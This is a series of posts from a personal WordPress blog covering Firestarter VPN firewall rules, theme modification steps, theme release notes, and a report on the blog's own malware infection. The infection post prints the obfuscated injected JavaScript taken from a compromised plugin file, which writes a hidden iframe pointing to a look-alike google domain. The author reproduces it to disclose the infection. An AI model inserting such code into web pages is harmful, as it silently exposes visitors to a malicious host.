After doing a fresh install of Ubuntu 9.10 Karmic Koala on my router, I realized that I had lost the ability to connect to my employer’s VPN. I use Firestarter for managing my firewall on this particular router.
As I usually do, I googled “firestarter vpn“. Much to my dismay, it appeared that the Firestarter website was no longer alive. Instead of the usual Firestarter page, a page filled with useless links about security and anti-virus loaded. Luckily I was able to access the cached version of the page from Google. Since then, it appears that the Firestarter website has come back to life.
I wanted to make a note of how to allow VPN connections in the event that the Firestarter website becomes inaccessible again, that’s basically the point of this post. The page on the Firestarter site that details VPN connections can be found here. This should apply to pretty much every Linux distribution, not just Ubuntu.
To allow VPN connections with the Microsoft VPN client, simply enter the following lines into /etc/firestarter/user-pre.
# Forward PPTP VPN client traffic
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 1723 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INIF -o $IF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
And to allow VPN connections with the Cisco VPN client, enter the following lines into /etc/firestarter/user-pre.
# Forward Cisco VPN client traffic
$IPT -A FORWARD -i $IF -o $INIF -p udp --dport 500 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 500 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p 50 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INIF -o $IF -p 50 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
Finally, if you’re running a Microsoft VPN server and want to allow incoming PPTP VPN connections, add the following lines to /etc/firestarter/user-pre.
# Forward PPTP VPN connections to internal server
SERVER=192.168.0.100 # Internal VPN server
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 1723 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A PREROUTING -i $IF -p tcp --dport 1723 -j DNAT --to $SERVER
$IPT -A FORWARD -i $IF -o $INIF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A PREROUTING -i $IF -p 47 -j DNAT --to $SERVER
That should pretty much cover it. If you are using OpenVPN, head over to the Firestarter VPN configuration page for details.
For some time now, comments have been disabled on pages in K2 and Unwakeable. The modifications needed to allow comments on pages are extremely easy to make. If you use either of these themes and wish to enable comments on pages, please continue reading.
1. Open the page.php file located in your K2 or Unwakeable theme directory. Go to line 36, it should look like this:
2. Comment out that if statement, so it should look like this when you’re done:
3. You’re halfway done at this point. Now go to line 40, which should look like this:
4. Comment out this piece of code as well, so modify line 40 so it looks like the code below.
5. Save the page.php file and you should be all set.
I will make this modification in the next release of Unwakeable so you won’t have to modify it yourself. You can expect to see a new version of Unwakeable released within a week.
So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google. Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.
Turns out this blog was infected with a go00ogle.net malware script. After following this helpful blog post, I was able to pinpoint the Audio Player plugin for WordPress as the culprit. The infected file was audio-player.js, and contained this snippet of code that should not have been there:
function advQuery(){
var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();
I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.
K2 1.0-RC8 has been released. It has support for threaded comments and child themes. You can also edit the post meta without having to modify any code now. A list of bug fixes can be found here, and below is the full post from the K2 blog:
This release adds support for Threaded Comments and Child Themes. Styles have been improved. You can specify where Styles are stored at, activate multiple styles, and edit them in the WordPress Theme Editor. You can also now customize the Post Meta (the line that reads Published by John Doe…) without having to edit any code.
I plan on building the next version of Unwakeable in the next couple weeks and will likely base it off of K2 1.0-RC8.
I just uploaded a new version of Unwakeable, version 1.5.3 rc1. This new version works with WordPress 2.7.1, unlike the previous version of Unwakeable.
Unwakeable 1.5.3 rc1 is up-to-date with K2 r776. K2 no longer includes the K2 Sidebar Manager. If you were using K2 Sidebar Modules and want to continue using it, you can download the plugin here.
There’s a new option on the Unwakeable Options page that allows you to customize top and bottom meta information for each post. The top meta information will be displayed directly under the title of a post. The bottom meta information will be displayed at the end of the posts content. You can use the following keywords to define what information you want to show: %author%, %categories%, %comments%, %date%, %tags% and %time%.
Have a look below to see what to enter in the top meta and bottom meta sections to display the same information that’s being displayed here.
Top Meta: Published by %author% on %date% at %time% %comments%
Bottom Meta: Categories: %categories% %tags%
You can download Unwakeable 1.5.3 rc1 from the Unwakeable page, or click here to download it directly.
